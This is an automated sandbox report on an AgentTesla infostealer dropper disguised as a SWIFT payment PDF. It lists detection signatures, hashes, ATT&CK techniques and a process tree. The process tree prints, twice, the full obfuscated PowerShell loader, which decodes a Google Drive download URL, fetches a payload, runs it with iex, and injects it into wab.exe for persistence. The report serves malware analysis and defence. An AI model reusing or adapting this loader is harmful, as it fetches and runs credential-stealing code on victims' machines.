Overview

overview

10

Static

static

1

SWIFT Copy...df.vbs

windows7-x64

10

SWIFT Copy...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-04-2024 01:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SWIFT Copy000224042024-pdf.vbs

  • Size

    34KB

  • MD5

    ec0b0c5aca480e26979b6d7dda8cbb14

  • SHA1

    a98b3addf15724c049e1f2e44a071df9e7b0df21

  • SHA256

    d5271109119ab792f4d1adfa7e24979a19fed1b0d13092b78db4114e3e943170

  • SHA512

    b1deee49cd2f74b0c1c651414181e563dcdbd8658573380dc1dc419b5b8962df6f0105387eb0718087b4ac6efcc963fba3ca253c82cef10be4f07a38d986b713

  • SSDEEP

    384:3E/p5dFHavtyX+hCajcYRn9LH/Y7Yzlgv9gufiQSKBq42:U/pRL+hDjcswPv9gyRSKBq42

Score
10/10
agentteslakeyloggerpersistencespywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
  • Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 2 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
  • Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT Copy000224042024-pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3480
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Smid = 1;$Skoningen='S';$Skoningen+='ubstrin';$Skoningen+='g';Function Unarmorial($Neglectful){$Shia=$Neglectful.Length-$Smid;For($Expt124=5; $Expt124 -lt $Shia; $Expt124+=(6)){$Klebrns85+=$Neglectful.$Skoningen.Invoke( $Expt124, $Smid);}$Klebrns85;}function Microthermic($Photomicrogrammes){. ($Nontragic) ($Photomicrogrammes);}$Strikkeri=Unarmorial 'OverbM Ult obystrzU,dstiuddanl.onfel.uffuaPree./Sla e5 Soci.I dsi0Sa.aa Grank(Erst,WGaiasiMisc,n Dds.d Vej oBemadwPist.s.tami QuercNLsepuTA,skr Suble1D ask0bov.n.Oleoy0Acrid;Beton FllesWLit.iiAthlenCeyss6Incon4ddsaa;Miskn VolpexEib i6Multi4Crumb; lex sp.nrPrespvSubli:taget1 diog2 Ka,e1.anta.secon0wabbl)Swoos Rus,GfasereFolkecukasekbehano hvir/Polyt2Brug.0Genfd1Clock0Tioud0Unpar1Diad,0Inter1Rejse SweepFAdvari D.abrIntraeAppref kuldoendosxScrup/Bulbo1 Brod2 Dolc1Tiltm.Pdof 0gran ';$Hypertension=Unarmorial 'SpingUGulphs antieIronir Drys-Bid,eAIsbjegScaleecountn ChantMilch ';$Skrubberier=Unarmorial ' Afgih WalltAbdomt emifpStrafsAnfre:Paede/Coofs/Tids d Et,nr ruteiOverwvHnd.seTo,lh.AmoungAloysoSy,veo ProsgA deflReap,e,oold. SaddcForhaoMedtnmSocia/BrugeuChiroc Omsa?ImpereTagkaxSmykkpLatvio Super empitSerpi=FjerndNaisso.anddwKursvnBiogrlBac aoMa,moaRevandOcto.&FasanichipmdShi t=Rikki1Disci8unaptN Pleji BasooP.litHAnaloT PapibSe,enDSkovmXD.gte0PasswGConchJPaiocRJampay LegedTrigoiFelinNBru eu Kirk6SwatrDUnsusd OmbisNadirR DegecProgrqM.ddeb Sp,gjCornb6 Ga rwBerapJ ko,vtVeder0Be.kf ';$Fiskeriministeren152=Unarmorial 'Gaul.> Sytj ';$Nontragic=Unarmorial 'In skiVeltae misdxS ant ';$Southwester='Kalds';Microthermic (Unarmorial 'efterS IndueUdra tbarti-SlogaCPocksoUdrydnAngletErro eBenevnIrrestChass S apm- CanoP.ockeaSpotlt Fo ehAcidi SkovfTOddfe:deleg\GlgniOStrukfGlggeeSt.atlBlostiis,afa K,ro. U vatContax LogitMiljb Sve,s-SkrivVdk.inaFlaadl TvrduCanale Avne Misea$S oppSEmpo.oRedanu.licktTuli.hNon,cwUn.ereT.iums rojkt.eroeeFolker Til ;Verbo ');Microthermic (Unarmorial 'BilleiPichif flu ,kor(.uckstUnr meHeuchsskatttveget-CoronpFortra GitttBiorhhR.gns MarkaTFestl:Recip\ S umOSlsetf AnskeTimidlSolskiKildeaponde.AnophtLseprxReplatwarmn)La.ia{Facsie PartxSamfuiH rrotScien}sunna;Advar ');$Nationaliteternes = Unarmorial 'TruceeSirbucbrig.h PreioTromb Pol t% Un,kaKarakp osttpStorkdLavsta GlortDeboraFrevl% Fejl\Tell,r isaneSkyrefBrilluAla.ml Hel,gKnsceeS.utk.FrekvBVolkso CricdI ent Opopo&Lynkr& hin Badese dvokcHomoph Vkk o Par Ka.to$O.cur ';Microthermic (Unarmorial 'blksp$DetergAfganlinsu,oFang,bInsu,a Sy,olTurb.:GemmeA Nonog EburgEmpirrTranseLy ozg ExpuaFordjtJaloueKa.orn MulieLascis De usSvire=Looka(Essinc Sl,gmEfte dg,ard Kapre/PersocVal,f Tral.$,rossNTiltvaMikrot ritmiPoudro ontin juveaKon,elMu,chiFree.tvitaleProp,t Subfe,arinrOverhn.afeeeTent,s Aft,)Sene, ');Microthermic (Unarmorial 'Sub.i$Hj pngRokkelHyperoPromebNonc aadiphlBager: FirsTPrem.rCohncy,ompakMos,ubFo valInteng Reore tradr OpmusAflsn1Kamfe1 Unde3 rov=Viceb$ MidsSJeremk BlodrReperu IdrtbUdmajb UdfleSkuddrDrai,ieftereB,tsorStack. EntesNonrepdefe.lAz.toiMell,tWatti(Manu,$ JordFG,resil oplsKlvelkQuareeLi.ssrO.tuniUf.rsmTop,oiRea.inOlympiv,ndlsZapa,tTr.kweslhu rFormue Bl.pn Teks1 Besg5Konst2Depla)Gy,os ');$Skrubberier=$Trykblgers113[0];Microthermic (Unarmorial 'Comel$SynskgA,diclSk mfoPetkibUnderaaffoll Cole:SkifeE h,lppFors,oFeatos S,ncsMnstee,aglsr PrstnS lereTab,lsBr kk=For.eNAssoce .nwowCo,te-Def.nOServibBoss.j.nconeKujoncThatctAnter Min fSUnglayKopulsAmssnt Cystetr nsmIsole.N.ghtNDrueseGeosttSa.sa.Op osW Ti,feSla,ibSaldoCWrongl,getsiEddaeeUdt nnA.tietGyrou ');Microthermic (Unarmorial 'Sands$deregE SystpCo,groHjkoms KagesPl.mmeg nlor Ge anBo tdePsychsramsh. TilrHCoeloeFastgamas,adadlumeSubedr KapisDisqu[.nsam$FarseHArcheyPsychpTwaese G acrMe.amtPogroePsychnLedi,sSpireiNskesoM,ridnp.osc].nobu=Brevs$OpecdS Meact,rnker Rhini RubakMy hok FlokeDumdrr sargiSvben ');$Pryglet=Unarmorial ' Dag.Enondeps,rucoSandbsSyn rsOpalieBasbarBach.nColibeBearns None.CohabD averoUde.lwPostbnStrailStumpoNonetaBohe.dHonorFbeslai Gra.l.xemeeBurre(Reakt$Disp.SM.rgekM nxirRoqueuTrskrbDe egbChic eNaj,dr jathi oltieBal,orslett,L.erb$GeomotpockerA gosiPentrgAffrou Ort.ySlibn)W.irr ';$Pryglet=$Aggregateness[1]+$Pryglet;$triguy=$Aggregateness[0];Microthermic (Unarmorial 'Splej$Inobsg di elTutt,oFilerbSpejdaHailslUnfol:BrnegS Pus aThor.m Afspm omateBrne,n archl.onpeiBrusegSympanGasmaiBjergn Sl tg Ptersoverwg.umanrfriafuVaccinSol qdUdkikl sk,la wimmgJagtheRec.lnOutche Sto.=Trons(linieT pseueLsrefsPhylltUnper-StudeP UdloaHygeitUnblehWhips Immat$Ulykkt.olycr,atali StnkgBehinuUbeskyDy sv)Spgef ');while (!$Sammenligningsgrundlagene) {Microthermic (Unarmorial 'Gamac$Pa.skgAftenl Mi eou,magbSpif a DebalTr.gi:LovhjEDistrxtilt,aTvaermFang,i rain.ygniaUnconbRedvei,heodl BrndiUnivetHe rkyBlufr1Bjffe3Che.k3 anni= in a$ Coadt For rHete uStre.e Kvik ') ;Microthermic $Pryglet;Microthermic (Unarmorial 'GloruSKol etAfmela IndirgammetFik e-E.atsSFiss,lregnfeN ddmeCard,p ooth Spie,4judai ');Microthermic (Unarmorial ' Reva$Dek.mgI,ustlCisteoS,artbRod ka tenclblreh:SkoleS esmeaSlgtsmUnbehmKagese scutnGeopolStab,iSolubgVisnenKendsi virunStintgBimets PlovgProcrr,astouP.lebn ic bdForr.lTermia epoygStyr,eLoaminIntooeInsan=Bespr(druryT lideAmbits DekltPosty-BevisPDir.caCitywtFrisoh Berr Repo$PityitK,adsr,opvii ndig Spgeu ,atayUnhal) Over ') ;Microthermic (Unarmorial 'Schlo$Ensa,g RecolarteroDidynbLinieac,skdlLiqui: varpSAirpaaIllumb,heidlJustee GivenBistesTerra=Aerin$waldegPanc,lP.rgaoS,ttebSammeaStikkl Purp:SkittI.inicn Con c ,emiaCounsnSassatSkedea HalvtsanikoVagt,rM.edeyJakke+Accur+ Wr t%Revea$UoverTDistirstympy Fan kDullsbcradllFoedegSalmieWineyr A.lisUdtmm1kusse1 Adm 3Pyrrh. F.recLysbaoToaaru Yamsnpseudt ides ') ;$Skrubberier=$Trykblgers113[$Sablens];}Microthermic (Unarmorial 'An,ia$B,oclgGrnselFl atoSurgebstik.aba solPseud:G.ldeTGudbeeGotisaIndebkRetsftPrerorAnisesforudsSkattkDefina moonbRere ,utra= Nonf SygejGPushoeGlde tO.igi-LufteCProtooVer.unEkspatTrilleDagpenStrigt Ford ,kov$ Eu,tt dkorunipoiSkftngEmi auSpindyHigh. ');Microthermic (Unarmorial ',igpt$Masseg.upplltvineoEndekbOverpau amol.ocke: yliPConrioNubrentrip.tNo,nui CellfT,afiiEmpatc Bevga.rrevl F.rbiN nmobPoleruArgufsDvrga Dyrkn= stra Teto[ ,ninSManv yParlysBulkstRegule SubgmSchot.afkryC Outso hurtnIndsnv Lb,telobbyr G.antS dom],rkle: grun:krediFM llerp.intoTorntm Ge.bBSiliraForess.otteeSteno6 Tyfu4LutreS.undetMobilrStramiSprngn Alg,gPrete(Storm$entreTMglineCom oaSpermkSkalot ebrdrenheds ,ecosInedukOpklaa Et,bb,ffal) Moun ');Microthermic (Unarmorial 'Forky$Diamog Kr,olHjertoLaterbPalt.a .ggilSubtr:Drou,L MareuUnderdStyrtiGaspecDeparrNoncooJanics.autoiOmhegtSauroyFod.o Belie=Unive Op ar[UnflaSPhellyHjlpes jertfro.teTordimSr,ov.Sem.eTH.ddieStudexSofactSella.souteEParalnCulv cOphjeoMicrodLoudsiNonsyn agblgTrach]Atrer: Armf:Sca.pASkr.eSMowerCM.dleISejesIRa,ke.Burl,GHomoleSlumktbud tSBuildtFribarHomo iA ternTribeg Insc( hyli$ LevePCocruolignin .kratFj,rniAnte fFlagsiEcto.cUpsolaIfrellU meriIriscbEkspluRugbrsLaane)Hou,e ');Microthermic (Unarmorial 'Kav.a$OversgMentilSchiloUda,bb DelaaEmpirl Like:Afst,BBelooePrin,n DagdeYn lin .rakeMiddesAnore=,alci$AutomL.ortouAma,rdFugleilngslcGerm,rconsooGavlts Ka ti peritD ugmyOptim.Slutns R keuKranibDeregs Plent Error Ans iWalkin,dflugTechn(Inspo3Balan1Garra1Angiv6Unapt1Blgef2Caloy,Forst2 Kove7D.riv8Synkr7Basta0 ,yat) Syno ');Microthermic $Benenes;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3512
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\refulge.Bod && echo $"
        3⤵
          PID:2892
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Smid = 1;$Skoningen='S';$Skoningen+='ubstrin';$Skoningen+='g';Function Unarmorial($Neglectful){$Shia=$Neglectful.Length-$Smid;For($Expt124=5; $Expt124 -lt $Shia; $Expt124+=(6)){$Klebrns85+=$Neglectful.$Skoningen.Invoke( $Expt124, $Smid);}$Klebrns85;}function Microthermic($Photomicrogrammes){. ($Nontragic) ($Photomicrogrammes);}$Strikkeri=Unarmorial 'OverbM Ult obystrzU,dstiuddanl.onfel.uffuaPree./Sla e5 Soci.I dsi0Sa.aa Grank(Erst,WGaiasiMisc,n Dds.d Vej oBemadwPist.s.tami QuercNLsepuTA,skr Suble1D ask0bov.n.Oleoy0Acrid;Beton FllesWLit.iiAthlenCeyss6Incon4ddsaa;Miskn VolpexEib i6Multi4Crumb; lex sp.nrPrespvSubli:taget1 diog2 Ka,e1.anta.secon0wabbl)Swoos Rus,GfasereFolkecukasekbehano hvir/Polyt2Brug.0Genfd1Clock0Tioud0Unpar1Diad,0Inter1Rejse SweepFAdvari D.abrIntraeAppref kuldoendosxScrup/Bulbo1 Brod2 Dolc1Tiltm.Pdof 0gran ';$Hypertension=Unarmorial 'SpingUGulphs antieIronir Drys-Bid,eAIsbjegScaleecountn ChantMilch ';$Skrubberier=Unarmorial ' Afgih WalltAbdomt emifpStrafsAnfre:Paede/Coofs/Tids d Et,nr ruteiOverwvHnd.seTo,lh.AmoungAloysoSy,veo ProsgA deflReap,e,oold. SaddcForhaoMedtnmSocia/BrugeuChiroc Omsa?ImpereTagkaxSmykkpLatvio Super empitSerpi=FjerndNaisso.anddwKursvnBiogrlBac aoMa,moaRevandOcto.&FasanichipmdShi t=Rikki1Disci8unaptN Pleji BasooP.litHAnaloT PapibSe,enDSkovmXD.gte0PasswGConchJPaiocRJampay LegedTrigoiFelinNBru eu Kirk6SwatrDUnsusd OmbisNadirR DegecProgrqM.ddeb Sp,gjCornb6 Ga rwBerapJ ko,vtVeder0Be.kf ';$Fiskeriministeren152=Unarmorial 'Gaul.> Sytj ';$Nontragic=Unarmorial 'In skiVeltae misdxS ant ';$Southwester='Kalds';Microthermic (Unarmorial 'efterS IndueUdra tbarti-SlogaCPocksoUdrydnAngletErro eBenevnIrrestChass S apm- CanoP.ockeaSpotlt Fo ehAcidi SkovfTOddfe:deleg\GlgniOStrukfGlggeeSt.atlBlostiis,afa K,ro. U vatContax LogitMiljb Sve,s-SkrivVdk.inaFlaadl TvrduCanale Avne Misea$S oppSEmpo.oRedanu.licktTuli.hNon,cwUn.ereT.iums rojkt.eroeeFolker Til ;Verbo ');Microthermic (Unarmorial 'BilleiPichif flu ,kor(.uckstUnr meHeuchsskatttveget-CoronpFortra GitttBiorhhR.gns MarkaTFestl:Recip\ S umOSlsetf AnskeTimidlSolskiKildeaponde.AnophtLseprxReplatwarmn)La.ia{Facsie PartxSamfuiH rrotScien}sunna;Advar ');$Nationaliteternes = Unarmorial 'TruceeSirbucbrig.h PreioTromb Pol t% Un,kaKarakp osttpStorkdLavsta GlortDeboraFrevl% Fejl\Tell,r isaneSkyrefBrilluAla.ml Hel,gKnsceeS.utk.FrekvBVolkso CricdI ent Opopo&Lynkr& hin Badese dvokcHomoph Vkk o Par Ka.to$O.cur ';Microthermic (Unarmorial 'blksp$DetergAfganlinsu,oFang,bInsu,a Sy,olTurb.:GemmeA Nonog EburgEmpirrTranseLy ozg ExpuaFordjtJaloueKa.orn MulieLascis De usSvire=Looka(Essinc Sl,gmEfte dg,ard Kapre/PersocVal,f Tral.$,rossNTiltvaMikrot ritmiPoudro ontin juveaKon,elMu,chiFree.tvitaleProp,t Subfe,arinrOverhn.afeeeTent,s Aft,)Sene, ');Microthermic (Unarmorial 'Sub.i$Hj pngRokkelHyperoPromebNonc aadiphlBager: FirsTPrem.rCohncy,ompakMos,ubFo valInteng Reore tradr OpmusAflsn1Kamfe1 Unde3 rov=Viceb$ MidsSJeremk BlodrReperu IdrtbUdmajb UdfleSkuddrDrai,ieftereB,tsorStack. EntesNonrepdefe.lAz.toiMell,tWatti(Manu,$ JordFG,resil oplsKlvelkQuareeLi.ssrO.tuniUf.rsmTop,oiRea.inOlympiv,ndlsZapa,tTr.kweslhu rFormue Bl.pn Teks1 Besg5Konst2Depla)Gy,os ');$Skrubberier=$Trykblgers113[0];Microthermic (Unarmorial 'Comel$SynskgA,diclSk mfoPetkibUnderaaffoll Cole:SkifeE h,lppFors,oFeatos S,ncsMnstee,aglsr PrstnS lereTab,lsBr kk=For.eNAssoce .nwowCo,te-Def.nOServibBoss.j.nconeKujoncThatctAnter Min fSUnglayKopulsAmssnt Cystetr nsmIsole.N.ghtNDrueseGeosttSa.sa.Op osW Ti,feSla,ibSaldoCWrongl,getsiEddaeeUdt nnA.tietGyrou ');Microthermic (Unarmorial 'Sands$deregE SystpCo,groHjkoms KagesPl.mmeg nlor Ge anBo tdePsychsramsh. TilrHCoeloeFastgamas,adadlumeSubedr KapisDisqu[.nsam$FarseHArcheyPsychpTwaese G acrMe.amtPogroePsychnLedi,sSpireiNskesoM,ridnp.osc].nobu=Brevs$OpecdS Meact,rnker Rhini RubakMy hok FlokeDumdrr sargiSvben ');$Pryglet=Unarmorial ' Dag.Enondeps,rucoSandbsSyn rsOpalieBasbarBach.nColibeBearns None.CohabD averoUde.lwPostbnStrailStumpoNonetaBohe.dHonorFbeslai Gra.l.xemeeBurre(Reakt$Disp.SM.rgekM nxirRoqueuTrskrbDe egbChic eNaj,dr jathi oltieBal,orslett,L.erb$GeomotpockerA gosiPentrgAffrou Ort.ySlibn)W.irr ';$Pryglet=$Aggregateness[1]+$Pryglet;$triguy=$Aggregateness[0];Microthermic (Unarmorial 'Splej$Inobsg di elTutt,oFilerbSpejdaHailslUnfol:BrnegS Pus aThor.m Afspm omateBrne,n archl.onpeiBrusegSympanGasmaiBjergn Sl tg Ptersoverwg.umanrfriafuVaccinSol qdUdkikl sk,la wimmgJagtheRec.lnOutche Sto.=Trons(linieT pseueLsrefsPhylltUnper-StudeP UdloaHygeitUnblehWhips Immat$Ulykkt.olycr,atali StnkgBehinuUbeskyDy sv)Spgef ');while (!$Sammenligningsgrundlagene) {Microthermic (Unarmorial 'Gamac$Pa.skgAftenl Mi eou,magbSpif a DebalTr.gi:LovhjEDistrxtilt,aTvaermFang,i rain.ygniaUnconbRedvei,heodl BrndiUnivetHe rkyBlufr1Bjffe3Che.k3 anni= in a$ Coadt For rHete uStre.e Kvik ') ;Microthermic $Pryglet;Microthermic (Unarmorial 'GloruSKol etAfmela IndirgammetFik e-E.atsSFiss,lregnfeN ddmeCard,p ooth Spie,4judai ');Microthermic (Unarmorial ' Reva$Dek.mgI,ustlCisteoS,artbRod ka tenclblreh:SkoleS esmeaSlgtsmUnbehmKagese scutnGeopolStab,iSolubgVisnenKendsi virunStintgBimets PlovgProcrr,astouP.lebn ic bdForr.lTermia epoygStyr,eLoaminIntooeInsan=Bespr(druryT lideAmbits DekltPosty-BevisPDir.caCitywtFrisoh Berr Repo$PityitK,adsr,opvii ndig Spgeu ,atayUnhal) Over ') ;Microthermic (Unarmorial 'Schlo$Ensa,g RecolarteroDidynbLinieac,skdlLiqui: varpSAirpaaIllumb,heidlJustee GivenBistesTerra=Aerin$waldegPanc,lP.rgaoS,ttebSammeaStikkl Purp:SkittI.inicn Con c ,emiaCounsnSassatSkedea HalvtsanikoVagt,rM.edeyJakke+Accur+ Wr t%Revea$UoverTDistirstympy Fan kDullsbcradllFoedegSalmieWineyr A.lisUdtmm1kusse1 Adm 3Pyrrh. F.recLysbaoToaaru Yamsnpseudt ides ') ;$Skrubberier=$Trykblgers113[$Sablens];}Microthermic (Unarmorial 'An,ia$B,oclgGrnselFl atoSurgebstik.aba solPseud:G.ldeTGudbeeGotisaIndebkRetsftPrerorAnisesforudsSkattkDefina moonbRere ,utra= Nonf SygejGPushoeGlde tO.igi-LufteCProtooVer.unEkspatTrilleDagpenStrigt Ford ,kov$ Eu,tt dkorunipoiSkftngEmi auSpindyHigh. ');Microthermic (Unarmorial ',igpt$Masseg.upplltvineoEndekbOverpau amol.ocke: yliPConrioNubrentrip.tNo,nui CellfT,afiiEmpatc Bevga.rrevl F.rbiN nmobPoleruArgufsDvrga Dyrkn= stra Teto[ ,ninSManv yParlysBulkstRegule SubgmSchot.afkryC Outso hurtnIndsnv Lb,telobbyr G.antS dom],rkle: grun:krediFM llerp.intoTorntm Ge.bBSiliraForess.otteeSteno6 Tyfu4LutreS.undetMobilrStramiSprngn Alg,gPrete(Storm$entreTMglineCom oaSpermkSkalot ebrdrenheds ,ecosInedukOpklaa Et,bb,ffal) Moun ');Microthermic (Unarmorial 'Forky$Diamog Kr,olHjertoLaterbPalt.a .ggilSubtr:Drou,L MareuUnderdStyrtiGaspecDeparrNoncooJanics.autoiOmhegtSauroyFod.o Belie=Unive Op ar[UnflaSPhellyHjlpes jertfro.teTordimSr,ov.Sem.eTH.ddieStudexSofactSella.souteEParalnCulv cOphjeoMicrodLoudsiNonsyn agblgTrach]Atrer: Armf:Sca.pASkr.eSMowerCM.dleISejesIRa,ke.Burl,GHomoleSlumktbud tSBuildtFribarHomo iA ternTribeg Insc( hyli$ LevePCocruolignin .kratFj,rniAnte fFlagsiEcto.cUpsolaIfrellU meriIriscbEkspluRugbrsLaane)Hou,e ');Microthermic (Unarmorial 'Kav.a$OversgMentilSchiloUda,bb DelaaEmpirl Like:Afst,BBelooePrin,n DagdeYn lin .rakeMiddesAnore=,alci$AutomL.ortouAma,rdFugleilngslcGerm,rconsooGavlts Ka ti peritD ugmyOptim.Slutns R keuKranibDeregs Plent Error Ans iWalkin,dflugTechn(Inspo3Balan1Garra1Angiv6Unapt1Blgef2Caloy,Forst2 Kove7D.riv8Synkr7Basta0 ,yat) Syno ');Microthermic $Benenes;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3732
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\refulge.Bod && echo $"
            4⤵
              PID:3472
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2120

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      1
      T1112

      Credential Access

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Web Service

      1
      T1102

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xmfnt3y3.ywf.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit
      • C:\Users\Admin\AppData\Roaming\refulge.Bod
        Filesize

        442KB

        MD5

        d46f9ca4ea9e4dd43d582b9f2e38199e

        SHA1

        09f5c2a00e0f709038145b03889e3ab6263824ed

        SHA256

        94dc661c05f18accf414194688b8950a9e0180df256227f30acf4c606a923d6e

        SHA512

        7cd257aa22802931aa5b9c6adee5a6430fb587da25da24e2756b0aa50af9b47f478e19705b117dc2d6032c410565a027c4545b12aedb403e3ff389567087681b

        Download Submit
      • memory/2120-61-0x00000000008B0000-0x0000000001B04000-memory.dmp
        Filesize

        18.3MB

        Download
      • memory/2120-67-0x0000000021530000-0x0000000021580000-memory.dmp
        Filesize

        320KB

        Download
      • memory/2120-62-0x00000000008B0000-0x00000000008F2000-memory.dmp
        Filesize

        264KB

        Download
      • memory/2120-68-0x0000000021620000-0x00000000216B2000-memory.dmp
        Filesize

        584KB

        Download
      • memory/2120-69-0x0000000021580000-0x000000002158A000-memory.dmp
        Filesize

        40KB

        Download
      • memory/3512-4-0x0000026A6C0C0000-0x0000026A6C0E2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/3512-17-0x0000026A69F10000-0x0000026A69F20000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3512-15-0x0000026A69F10000-0x0000026A69F20000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3512-65-0x00007FFCCEF80000-0x00007FFCCFA41000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3512-16-0x0000026A69F10000-0x0000026A69F20000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3512-14-0x00007FFCCEF80000-0x00007FFCCFA41000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3512-48-0x0000026A69F10000-0x0000026A69F20000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3512-46-0x0000026A69F10000-0x0000026A69F20000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3512-45-0x0000026A69F10000-0x0000026A69F20000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3512-44-0x00007FFCCEF80000-0x00007FFCCFA41000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3732-21-0x0000000004F30000-0x0000000005558000-memory.dmp
        Filesize

        6.2MB

        Download
      • memory/3732-41-0x0000000007F90000-0x0000000008534000-memory.dmp
        Filesize

        5.6MB

        Download
      • memory/3732-40-0x0000000006D90000-0x0000000006DB2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/3732-43-0x0000000008540000-0x0000000009578000-memory.dmp
        Filesize

        16.2MB

        Download
      • memory/3732-39-0x0000000006E80000-0x0000000006F16000-memory.dmp
        Filesize

        600KB

        Download
      • memory/3732-38-0x0000000006D20000-0x0000000006D3A000-memory.dmp
        Filesize

        104KB

        Download
      • memory/3732-37-0x0000000007360000-0x00000000079DA000-memory.dmp
        Filesize

        6.5MB

        Download
      • memory/3732-36-0x0000000005C10000-0x0000000005C5C000-memory.dmp
        Filesize

        304KB

        Download
      • memory/3732-35-0x0000000005BD0000-0x0000000005BEE000-memory.dmp
        Filesize

        120KB

        Download
      • memory/3732-34-0x0000000005710000-0x0000000005A64000-memory.dmp
        Filesize

        3.3MB

        Download
      • memory/3732-23-0x0000000004E50000-0x0000000004EB6000-memory.dmp
        Filesize

        408KB

        Download
      • memory/3732-24-0x00000000055A0000-0x0000000005606000-memory.dmp
        Filesize

        408KB

        Download
      • memory/3732-22-0x0000000004D30000-0x0000000004D52000-memory.dmp
        Filesize

        136KB

        Download
      • memory/3732-20-0x0000000000E30000-0x0000000000E66000-memory.dmp
        Filesize

        216KB

        Download